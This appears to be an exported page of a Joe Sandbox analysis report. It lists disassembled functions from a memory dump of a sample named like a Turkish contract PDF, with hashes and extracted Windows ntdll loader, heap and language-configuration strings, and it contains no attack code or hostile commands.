                              • Instruction ID: 7bd3d43f50962ef7e833f7b647b41db40ad0adc461e80c3edfc20c1750527215
                              • Opcode Fuzzy Hash: f640d6a20495cdee582f343ed4c4455e64f42848e28a856d870ac273c01ae3b3
                              • Instruction Fuzzy Hash: 0F51E0B12487849FE314CF24DC91EAB77E8EF84744F404919FAD997161EB30D949CB92
                              Function 32B8D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                              • API String ID: 0-3532704233
                              • Opcode ID: b1f2170dd9e0888b6ffa0d310ce821dadf7a6435a6f713c6607d1ce1f55373a4
                              • Instruction ID: f2cadb028c4508b00f2ac14e7249a28dd897775537c5358e91ddd6e8b38aae58
                              • Opcode Fuzzy Hash: b1f2170dd9e0888b6ffa0d310ce821dadf7a6435a6f713c6607d1ce1f55373a4
                              • Instruction Fuzzy Hash: 5EB17BB69083969FD715CF24D480B9BB7E8EF84798F41492FF88997201DB70D948CB92
                              Function 32BBD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                              Download Yara Rule
                              APIs
                              • RtlDebugPrintTimes.NTDLL ref: 32BBD879
                                • Part of subcall function 32B94779: RtlDebugPrintTimes.NTDLL ref: 32B94817
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                              • API String ID: 3446177414-1975516107
                              • Opcode ID: 1c46e75296f1de76684c379cee2718f13978dce8f7dce2063fa4ec42d079853f
                              • Instruction ID: 712b372779ef58e0cd4492ba58c863d4cdb2eec88fa2c215ed4e4c594171906f
                              • Opcode Fuzzy Hash: 1c46e75296f1de76684c379cee2718f13978dce8f7dce2063fa4ec42d079853f
                              • Instruction Fuzzy Hash: 58512675A043469FEF04CFA4C984BEDBBF1FF44788F108559D8046B681DBB9A986CB80
                              Function 32B8D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                              Download Yara Rule
                              Strings
                              • @, xrefs: 32B8D24F
                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32B8D0E6
                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 32B8D136
                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32B8D06F
                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32B8D202
                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32B8D263
                              • @, xrefs: 32B8D2B3
                              • @, xrefs: 32B8D09D
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                              • API String ID: 0-1356375266
                              • Opcode ID: 95b72517b8aa31763b25a26f2613bd7b0ca14255a20f3dfd4bc1f6be5df1aceb
                              • Instruction ID: 216d87a9eef105b96f7a46e3c9f7780ac11a81ca50f1d1f6ab9ae39467dbb8c3
                              • Opcode Fuzzy Hash: 95b72517b8aa31763b25a26f2613bd7b0ca14255a20f3dfd4bc1f6be5df1aceb
                              • Instruction Fuzzy Hash: 59A14CB25083969FE321CF20D440B9BB7E8EF88759F40492EF99896241DB74D948CB92
                              Function 32C18633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                              Download Yara Rule
                              Strings
                              • VerifierFlags, xrefs: 32C188D0
                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 32C186E7
                              • AVRF: -*- final list of providers -*- , xrefs: 32C1880F
                              • HandleTraces, xrefs: 32C1890F
                              • VerifierDebug, xrefs: 32C18925
                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 32C186BD
                              • VerifierDlls, xrefs: 32C1893D
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                              • API String ID: 0-3223716464
                              • Opcode ID: 010142ac8b0c089bf360f0321fcae8bb832dc120e607685a4546f4cd9091bdcf
                              • Instruction ID: f0f1eadfbfcd3309ec0abf747731fbdc6a749ffe1353f70406ae64ba4c960588
                              • Opcode Fuzzy Hash: 010142ac8b0c089bf360f0321fcae8bb832dc120e607685a4546f4cd9091bdcf
                              • Instruction Fuzzy Hash: 599197715497919FF311CF249C81F1AB3A8FF81758F458A58F980AB241CBB4AC05EBD2
                              Function 32BB237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                              Download Yara Rule
                              Strings
                              • LdrpDynamicShimModule, xrefs: 32BFA7A5
                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32BFA79F
                              • minkernel\ntdll\ldrinit.c, xrefs: 32BFA7AF
                              • apphelp.dll, xrefs: 32BB2382
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-176724104
                              • Opcode ID: 34aceef0a58151c5e7f33d2d9ff0b0f0b9a6b6bfa49856fddff411f26bf99f3b
                              • Instruction ID: 3b9c8fef69260e480827a689910015d7e2407a96a8c624284076ebd41d7646e1
                              • Opcode Fuzzy Hash: 34aceef0a58151c5e7f33d2d9ff0b0f0b9a6b6bfa49856fddff411f26bf99f3b
                              • Instruction Fuzzy Hash: 38314879A40290FFFB189F18CC80E5E77B4EF80B54F248569ED0477240DBB1A886CB90
                              Function 32B8F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                              • API String ID: 0-523794902
                              • Opcode ID: 7c6a85e0cd9ba87210e19b297e3d96855eaf632cd817deecf9912a303d82e460
                              • Instruction ID: a772f1e918278b47cdc676081776b52c471cad74f01cf6fe95e79ac352fa157c
                              • Opcode Fuzzy Hash: 7c6a85e0cd9ba87210e19b297e3d96855eaf632cd817deecf9912a303d82e460
                              • Instruction Fuzzy Hash: 2642E1752087829FD305CF24C884B2ABBE5FF84788F448969E89ACB351DB74D985CB52
                              Function 32BAB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                              • API String ID: 0-122214566
                              • Opcode ID: 49d57a478dc7e1c44175aff7568a32b2cbcebc1e708c3801bb03d1caf0cf284d
                              • Instruction ID: d95fd27b43bb810e9b2eefb87749c80552be016eb79b4c42cc5bcffdd3c99e18
                              • Opcode Fuzzy Hash: 49d57a478dc7e1c44175aff7568a32b2cbcebc1e708c3801bb03d1caf0cf284d
                              • Instruction Fuzzy Hash: 8FC17C75A18355ABEF048B64CCB0BBE7BA1EF55348F50816AEC519B290DFB4DD88C390
                              Function 32BC631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-792281065
                              • Opcode ID: d3c8ce13613d390202995d17411c49934cc7de5a65f50bbbcc11ff6d534f015c
                              • Instruction ID: 1937fe790711174811570f57d6aadaf3fa68685e8d985248a14a7b54de9dca80
                              • Opcode Fuzzy Hash: d3c8ce13613d390202995d17411c49934cc7de5a65f50bbbcc11ff6d534f015c
                              • Instruction Fuzzy Hash: 15912670A467A49BE724CF18CD44F9A77A8EFC0758F10C169E954BB281DBB09842CFD1
                              Function 32BC2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                              Download Yara Rule
                              Strings
                              • SXS: %s() passed the empty activation context, xrefs: 32C01F6F
                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32C01FC9
                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32C01FA9
                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32C01F82
                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32C01F8A
                              • RtlGetAssemblyStorageRoot, xrefs: 32C01F6A, 32C01FA4, 32C01FC4
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                              • API String ID: 0-861424205
                              • Opcode ID: ba5b3f84356392d0bef729c4b54eb1d0229a048bee9acc9c75d398af1c578da3
                              • Instruction ID: d715f39ed6ffee2b7e87481e2633ca5815938f02b7e330dd89c023ec8072f535
                              • Opcode Fuzzy Hash: ba5b3f84356392d0bef729c4b54eb1d0229a048bee9acc9c75d398af1c578da3
                              • Instruction Fuzzy Hash: F931F676A002347BFB109A8A8C41F5BB76CDF45B98F0040A9B950B7251CBB1EE01DFE0
                              Function 32BA0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                              • API String ID: 0-4253913091
                              • Opcode ID: 5c7c8ed12b348a22cc9a184e8760709ea33501eff61c03a1e4b54017bcda4432
                              • Instruction ID: 4d58a080939c007138d8fef5c9c8dfad362b27e0b8fd15da13dc57e3a8082dac
                              • Opcode Fuzzy Hash: 5c7c8ed12b348a22cc9a184e8760709ea33501eff61c03a1e4b54017bcda4432
                              • Instruction Fuzzy Hash: F8F1DF74A04605EFEB09CF68C8A0F6AB7B5FF44344F1085A9E9099B381DB35E985CB90
                              Function 32BB9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                              • API String ID: 3446177414-2283098728
                              • Opcode ID: 4edca8e2b5b06899d406f5038c8d1b688c24f19bb0a4ed8c0a3a82693904eed6
                              • Instruction ID: 759c60f139705fbac7dfbb3adbd4e7346b861a15079d128c622a26de44b14564
                              • Opcode Fuzzy Hash: 4edca8e2b5b06899d406f5038c8d1b688c24f19bb0a4ed8c0a3a82693904eed6
                              • Instruction Fuzzy Hash: 9B51FF70604B119BEB14DF38CC80F2977E5FF88358F144A2DE9519BA91EBB0A845CF92
                              Function 32BCC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • LdrpInitializePerUserWindowsDirectory, xrefs: 32C080E9
                              • Failed to reallocate the system dirs string !, xrefs: 32C080E2
                              • minkernel\ntdll\ldrinit.c, xrefs: 32C080F3
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                              • API String ID: 3446177414-1783798831
                              • Opcode ID: 824747dd398669c3f506d7263a37b3ad6d74e6598b93a35f080327146624d26b
                              • Instruction ID: 80880ef8ebcaa840c0441982b8510eaf2e5974195ece8881c48f96362411f46e
                              • Opcode Fuzzy Hash: 824747dd398669c3f506d7263a37b3ad6d74e6598b93a35f080327146624d26b
                              • Instruction Fuzzy Hash: 524113B5545390ABD710EB64DD00F5B77E8EF84B54F108A3AF898E3250EBB0D841CB92
                              Function 32C143D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • minkernel\ntdll\ldrredirect.c, xrefs: 32C14519
                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32C14508
                              • LdrpCheckRedirection, xrefs: 32C1450F
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                              • API String ID: 3446177414-3154609507
                              • Opcode ID: 4c0c92ea71558900e280f20578fe0305cb8050281aafe4912efbdeb2bdfe7727
                              • Instruction ID: dc4f2b27cf17e2dfca41571302e9db8c9c39186d8e70fedb97451b54adbec09b
                              • Opcode Fuzzy Hash: 4c0c92ea71558900e280f20578fe0305cb8050281aafe4912efbdeb2bdfe7727
                              • Instruction Fuzzy Hash: 2541DFB66057119BDB20CF58C843A9677E5AF88794F064A69FC88EB351DB30F801EB81
                              Function 32BB510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                              Download Yara Rule
                              Strings
                              • Kernel-MUI-Number-Allowed, xrefs: 32BB5167
                              • WindowsExcludedProcs, xrefs: 32BB514A
                              • Kernel-MUI-Language-Allowed, xrefs: 32BB519B
                              • Kernel-MUI-Language-SKU, xrefs: 32BB534B
                              • Kernel-MUI-Language-Disallowed, xrefs: 32BB5272
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                              • API String ID: 0-258546922
                              • Opcode ID: 2eec537af5552d75513dc826bf0b9da11e67327d6ddc18011ee8749b35e12b1b
                              • Instruction ID: 7607b06bcd69c922ec8845f1613d137772e946d379a8fadfd897701bf5785431
                              • Opcode Fuzzy Hash: 2eec537af5552d75513dc826bf0b9da11e67327d6ddc18011ee8749b35e12b1b
                              • Instruction Fuzzy Hash: A7F15E76D01229EFDF15CF98C990EEEBBB9EF08754F54405AE901A7210DBB19E01CBA0
                              Function 32B87662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                              • API String ID: 0-3061284088
                              • Opcode ID: 558e703677fae14dcba02bf692dd2c3df7b286f272944a835c00dfdfd15c820c
                              • Instruction ID: 14646c8b777dd264080144094ab9f4bd9e80077bcec2cec0dd2f48f971739de9
                              • Opcode Fuzzy Hash: 558e703677fae14dcba02bf692dd2c3df7b286f272944a835c00dfdfd15c820c
                              • Instruction Fuzzy Hash: 600120360191D0DFF3159738E408F9677A8FB41738F1484D9F045875A1CFA99840E660
                              Function 32B90485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32B90586
                              • kLsE, xrefs: 32B905FE
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                              • API String ID: 3446177414-2547482624
                              • Opcode ID: 0bcff495a0054be4256851ea2f46da6c788a35dcfda3ba2f147cfa698cf973a7
                              • Instruction ID: 411ab2b77978cac96ff42f122cefa050bfdf1c3820abd2d789ee3a620006bc48
                              • Opcode Fuzzy Hash: 0bcff495a0054be4256851ea2f46da6c788a35dcfda3ba2f147cfa698cf973a7
                              • Instruction Fuzzy Hash: 51519AB5A007569FEB14DFA4C480BEAB7F4EF44304F10883EDA9AD7242EB749545CBA1
                              Function 32B9A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                              • API String ID: 0-379654539
                              • Opcode ID: 989a7f20f81ee01274b434a694118a00610ec97768a784b2cf3ebd471c988518
                              • Instruction ID: d7949985ab1d2efb83c07896b84614a89aa0ed35f8e29313adfc4c274fee84cc
                              • Opcode Fuzzy Hash: 989a7f20f81ee01274b434a694118a00610ec97768a784b2cf3ebd471c988518
                              • Instruction Fuzzy Hash: C5C1AA74208392DFE715CF28C080B9AB7E4FF85748F04886AF8959B351EB34D94ACB52
                              Function 32BC8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                              Download Yara Rule
                              Strings
                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 32BC847E
                              • LdrpInitializeProcess, xrefs: 32BC8342
                              • minkernel\ntdll\ldrinit.c, xrefs: 32BC8341
                              • @, xrefs: 32BC84B1
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-1918872054
                              • Opcode ID: 5b7b89f08d61b36316331ff6d64b398c3fc3fb5ff60795b4c30d5e88339825d7
                              • Instruction ID: 7c50fd4868e19025ebf6b4c3b55dc4ba9e6b3e62dde265cd7b221c0673ce59ad
                              • Opcode Fuzzy Hash: 5b7b89f08d61b36316331ff6d64b398c3fc3fb5ff60795b4c30d5e88339825d7
                              • Instruction Fuzzy Hash: 55914871508395ABE722DE60D840FABB7ECEF84788F44492EFA8892151E774D944CB62
                              Function 32BC265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                              Download Yara Rule
                              Strings
                              • SXS: %s() passed the empty activation context, xrefs: 32C01FE8
                              • .Local, xrefs: 32BC27F8
                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32C01FE3, 32C020BB
                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 32C020C0
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                              • API String ID: 0-1239276146
                              • Opcode ID: 81e0e7e02b6fa6cb2e7dd46345a9d16c6de22848945bcc1ab4e77783bf4ba851
